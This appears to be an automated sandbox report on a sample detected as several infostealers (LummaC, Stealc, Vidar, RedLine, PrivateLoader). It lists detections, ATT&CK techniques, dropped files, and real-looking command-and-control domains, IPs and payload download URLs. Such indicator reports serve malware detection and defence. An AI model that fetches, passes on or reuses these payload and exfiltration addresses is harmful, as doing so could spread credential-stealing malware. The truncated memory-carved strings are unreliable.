Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1364, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7856, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 15.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SYvU5mYtoLg0LBOPe0pXYHty.exe.3d55570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002D.00000002.2959845385.000000000122A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2327203276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2325083864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1895049208.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.9nou8XrciU9ATc03f2Eu4OO2.exe.3e15570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9nou8XrciU9ATc03f2Eu4OO2.exe PID: 4180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6876, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1364, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 15_2_6B610B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,

15_2_6B610B40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	31 Native API	21 Registry Run Keys / Startup Folder	511 Process Injection	111 Deobfuscate/Decode Files or Information	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	21 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	2 Software Packing	NTDS	157 System Information Discovery	Distributed Component Object Model	1 Email Collection	124 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	361 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	241 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	112 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	511 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
file.exe	35%	Virustotal		Browse
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\CBFIIEHJDB.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\ProgramData\GHDHDBAECG.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\ProgramData\KEHDBAEGII.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.RedlineStealer
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\userBAKKEGCAAE.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\userCAAKKFHCFI.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\userDHDAFBFCFH.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\userEHJDHJKFIE.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66fbfcc301a31_swws[1].exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\66fbfccd837ac_vadggdsa[1].exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\66fbfcc9963ca_ldfsna[1].exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\66fbfcc9963ca_ldfsna[1].exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\EdgeUpdater\596a8ed0706146e48ded9036d0de8611.exe	62%	ReversingLabs	Win32.Trojan.Privateloader
C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\Documents\iofolko5\9nou8XrciU9ATc03f2Eu4OO2.exe	61%	ReversingLabs	Win32.Trojan.RedlineStealer
C:\Users\user\Documents\iofolko5\SYvU5mYtoLg0LBOPe0pXYHty.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.RedlineStealer

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
treatynreit.site	1%	Virustotal	Browse
mysterisop.site	1%	Virustotal	Browse
cowod.hopto.org	2%	Virustotal	Browse
iplogger.org	1%	Virustotal	Browse
api64.ipify.org	0%	Virustotal	Browse
steamcommunity.com	0%	Virustotal	Browse
questionsmw.store	1%	Virustotal	Browse
gravvitywio.store	8%	Virustotal	Browse
absorptioniw.site	1%	Virustotal	Browse
api.ipify.org	0%	Virustotal	Browse
abnomalrkmu.site	1%	Virustotal	Browse
snarlypagowo.site	1%	Virustotal	Browse
yalubluseks.eu	2%	Virustotal	Browse
ipinfo.io	0%	Virustotal	Browse
soldiefieop.site	1%	Virustotal	Browse
chorusarorp.site	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://broadcast.st.dl.eccdnx.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
treatynreit.site	104.21.84.18	true	true	1%, Virustotal, Browse	unknown
mysterisop.site	172.67.195.67	true	true	1%, Virustotal, Browse	unknown
cowod.hopto.org	45.132.206.251	true	true	2%, Virustotal, Browse	unknown
iplogger.org	104.26.2.46	true	false	1%, Virustotal, Browse	unknown
api64.ipify.org	104.237.62.213	true	false	0%, Virustotal, Browse	unknown
snarlypagowo.site	104.21.18.193	true	true	1%, Virustotal, Browse	unknown
steamcommunity.com	104.102.49.254	true	true	0%, Virustotal, Browse	unknown
questionsmw.store	172.67.208.141	true	true	1%, Virustotal, Browse	unknown
absorptioniw.site	104.21.17.174	true	true	1%, Virustotal, Browse	unknown
abnomalrkmu.site	104.21.56.150	true	true	1%, Virustotal, Browse	unknown
gravvitywio.store	104.21.16.12	true	true	8%, Virustotal, Browse	unknown
ipinfo.io	34.117.59.81	true	false	0%, Virustotal, Browse	unknown
api.ipify.org	172.67.74.152	true	false	0%, Virustotal, Browse	unknown
soldiefieop.site	188.114.96.3	true	true	1%, Virustotal, Browse	unknown
yalubluseks.eu	104.21.54.163	true	false	2%, Virustotal, Browse	unknown
chorusarorp.site	unknown	unknown	true	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://49.12.197.9/	true		unknown
https://abnomalrkmu.site/api	true		unknown
https://soldiefieop.site/api	true		unknown
https://49.12.197.9/sqlp.dll	true		unknown
https://49.12.197.9/softokn3.dll	true		unknown
http://46.8.231.109/1309cdeb8f4c8736/softokn3.dll	true	URL Reputation: malware	unknown
https://yalubluseks.eu/receive.php	false		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
questionsmw.stor	true		unknown
https://49.12.197.9/vcruntime140.dll	true		unknown
https://49.12.197.9/nss3.dll	true		unknown
https://api64.ipify.org/?format=json	false		unknown
https://steamcommunity.com/profiles/76561199780418869	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exerm-data;	RegAsm.exe, 0000001E.00000002.2527499922.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yalubluseks.euD	LKMService.exe, 00000001.00000002.4135113004.0000000002849000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.000000000289F000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002908000.00000004.00000800.00020000.00000000.sdmp, LKMService.exe, 00000001.00000002.4135113004.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://go.microsoft.c5	9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1871405522.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199780418869H	RegAsm.exe, 0000001E.00000002.2538825385.0000000001442000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.microsoft	RegAsm.exe, 00000005.00000002.1882907666.0000000003B1F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	RegAsm.exe, 0000000F.00000002.2351185924.000000002766B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000151C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2959845385.0000000001288000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000002D.00000002.2984290523.0000000027781000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://abnomalrkmu.site/apiL	RegAsm.exe, 00000020.00000002.2115365446.000000000137A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004F6000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.youtube.com	RegAsm.exe, 00000029.00000002.3091506097.000000000113A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.000000000111A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199780418869P	RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeN	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cowod.hopto.org_DEBUG.zip/c	9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3091506097.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe	RegAsm.exe, 00000010.00000002.2677455575.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000063A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2924485555.000000000063A000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeF	RegAsm.exe, 0000002D.00000002.2984290523.00000000277F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://49.12.197.9/1S	RegAsm.exe, 00000010.00000002.2705735289.000000000102B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api64.ipify.org/?format=json/	RegAsm.exe, 00000005.00000002.1881533785.000000000134A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000010.00000002.2705735289.000000000101C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004DA000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000506000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004F6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.0000000000516000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004EF000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.2677455575.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2538825385.000000000146B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004FE000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000050E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.00000000004E8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.000000000051F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3084958642.0000000000506000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	9nou8XrciU9ATc03f2Eu4OO2.exe, 0000000C.00000002.1888061677.0000000003E15000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001E.00000002.2527499922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://api.ipi4	LKMService.exe, 00000001.00000002.4135113004.0000000002D1C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://treatynreit.site/	RegAsm.exe, 00000020.00000002.2115365446.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://46.8.231.109/1309cdeb8f4c8736/freebl3.dllk	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 0000003C.00000002.2924485555.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://s.ytimg.com;	RegAsm.exe, 00000029.00000002.3091506097.0000000001183000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000003C.00000002.2930077013.0000000001196000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	LKMService.exe, 00000001.00000002.4135113004.0000000002711000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeU	RegAsm.exe, 0000002D.00000002.2984290523.00000000277F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered	RegAsm.exe, 0000003C.00000002.2930077013.0000000001168000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://147.45.44.104/ldms/66fbfcc9963ca_ldfsna.exeS	RegAsm.exe, 0000000F.00000002.2327203276.0000000001149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
